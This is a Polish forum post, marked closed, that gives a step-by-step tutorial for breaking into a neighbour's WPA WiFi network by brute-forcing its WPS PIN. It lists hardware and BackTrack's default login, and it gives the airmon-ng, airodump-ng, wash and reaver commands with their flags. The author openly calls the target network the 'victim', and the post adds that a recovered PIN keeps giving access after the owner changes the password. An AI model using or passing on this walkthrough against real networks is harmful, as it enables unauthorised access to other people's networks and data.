[ZAMKNIĘTY Jak włamać się na WIFI

[Cthulhu2]

#1 Czego używam:

 

-wmWare

 

-Backtrack 5 r3 (albo Kali)

 

-Karta wifi ALFA AWUS036NHA z mocną antenką omni 8db (podpięta do talerza od satelity wyłapuje wifi na długości całej mojej ulic 45 sieci )

 

 

 

#2 Czemu wmWare a nie VirtualBox? Ponieważ VB się gryzie coś z połączniem.. nie wiem czemu nie chciało mi się rego rozkminiać. Szybciej i wygodniej zmienić na wmWare.

 

 

#3 Ten sposób złamie KAŻDE hasło WPA o ile router ma włączony WPS. Większość teraz ma domyślnie włączone  Więc jesteśmy na dobrej drodze. Jedynie co może nas powstrzymać to wyłączone WPS lub limit prób wpisania błędnego Pinu po którym musimy czekać np.5min

 

 

 

#4 Odpalamy Backtrack.. na początku trzeba wpisac login: root i hasło: toor

 

 

teraz mamy linię komend.. piszemy startx i enter

 

 

Gdy pokaze nam sie pulpit odpalamy terminal.

 

I teraz sterta komend i opisów obok

 

ifconfig - sprawdza nam czy mamy wlaczona karte wifi, jesli jest wyskoczy nam na liscie wlan0, jesli nie to jestesmy w dupie

airmon-ng start wlan0 to nam wlaczy nasz wlan0 (karte wifi) w tryb monitorowania mon0

 

airodump-ng mon0 teraz bedziemy skanowac powietrze w poszukiwaniu sieci ukryte tez nam wyskocza hrhrhhr tutaj bedziemy miec adres mac np. XX.XX.XX.XX.XX.XX naszej ofiary z lewej strony, a sygnal bedzie sie wachac pewnie pomiedzy -30db do -90db im mniej tym lepiej np. -60 jest spoko

 

 

Gdy juz mamy nasz mac i nazwe sieci którą chcemy, sprawdzamy czy jest mozliwosc ataku na WPS

 

wash mon0 - pokaze nam czy nazwa sieci jest podatna na atak

 

 

 

jak jest to ogień

 

 

reaver -i mon0 -b XX.XX.XX.XX.XX.XX

 

 

 

i teraz na koncu mozna dodawac rozne komendy

 

 

 

-vv wyswietli nam caly przebieg i co sie dzieje szczegolowo

 

-v pokaze tylko jaki pin i czy sie udalo czy nie

 

-N oznacza No-Nacks.. a co to jest who knows.. daje to zawsze, sprawdza sie wiec chyba potrzebne

 

-A automatyczne dostosowanie bardziej zaawansowanych ustawien lepiej dac tak.. sam czesto daje tak chyba ze mam strasznie oporna siec wtedy trzeba walczyc

 

-S skraca nam czas szuakania pinu przez sprawdzanie najbardziej prawdopodobnych pinzow

 

 

 

i na ogol moje komenda wyglada tak

 

 

reaver -i mon0 -b XX.XX.XX.XX.XX.XX -vv -A -S -N -w

 

 

 

zapomniałem..

 

 

 

-w udaje ze nasza maszyna ma system windows a nie linux

 

 

 

kolejnosc komend po adresie mac nie ma roznicy.

 

 

 

 

 

 

Ah no tak.. czas łamania zalezy od PINU na jaka cyfre sie zaczyna.. bo leci od dołu do góry pin składa się z 8 cyfr zawsze..

 

Ja miałem pecha bo ten PIN mzaczynał sie na 97xxxxx... masakra 10h..

 

 

 

 

 

Ale jak złamiemy PIN raz i go sobie zapiszemy to sąsiad moze sobie zmieniac hasło ile wlezie, PIN może tylko zmienic kupując nowy router lub grzebiąc w firmware..

 

 

A my mając PIN możemy sprawdzić nowe hasło kiedy chcemy tym programikiem

 

 

 

Za błedy sorry, pisałem z głowy a oczy mi się same zamykają.. zaraz spać i znów do roboty ;0